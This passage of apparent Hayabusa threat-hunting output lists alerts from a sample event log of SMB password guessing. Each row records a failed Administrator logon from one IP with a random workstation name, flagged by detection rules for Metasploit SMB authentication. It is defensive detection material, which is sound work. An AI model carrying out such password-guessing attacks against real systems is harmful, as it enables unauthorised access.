Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1BuBHLILZ4afwJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NN2h7CHnGSCQZXan : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BU3fxfM1qGBJ55HS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1OlBmhUABabDQbN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DgQtHG7cT05kRXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUTe3JqVWgDcDcOS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nGKgUOyX3USQlESB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcIJ8keQvgax1SuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A7jsyA7bWtVf4sLr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mijnM28fwbgWzkvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dNmJo7vkacqxA6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FxvD2OWtadDT1Q2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK8Esc50KVWIsLU5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U07NeCzXSdx5Nlgs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tObVl72GJse2HCGp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nbEnp2E5a3N78OBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlRmyinJLWwj5yQg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92H7tdXinUOxtOLV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Za42EUNuitIXaMBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kz7OtswOreS0fdeS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VMxY1IHx5VuvskM7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d6uxMqLCcqHkuesV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TmeAWYvFEbqJp1rt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tGAdT1CBRYRatVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0h9ulMPWtj8bEKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eLyLMNv6cOp3sgrq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIAOs16X8nFxV45x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z4EbyEaUxUEyuiY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDnW5GABBLbe6eZ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GublgQLD3RXQNmkX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BQRppHTUHAoWPe4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gnh6HFlIW1zWEBu5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ulbcy5PWLYUm5Sy0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L8rkZ7iBMam5o8VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n39Zox0PFeNirzyT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3u3YUCKxEo5pnKJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wen3pHM88kSRkHNf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGDHJ4KMm2zEMV0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKZAB1nfXPYSLxsE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tYkOsX0XDpkdvp01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9y7HjOeGPcrdj1c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLwh8Lg3nvbm8Q2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoMkBcp8ouIgpX4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2UnrDiOAOec5DQGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UxJGLShj5EDKLSDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iWhaz8W0VLQdXKWN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 82YDxSIBnCAqdK4c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 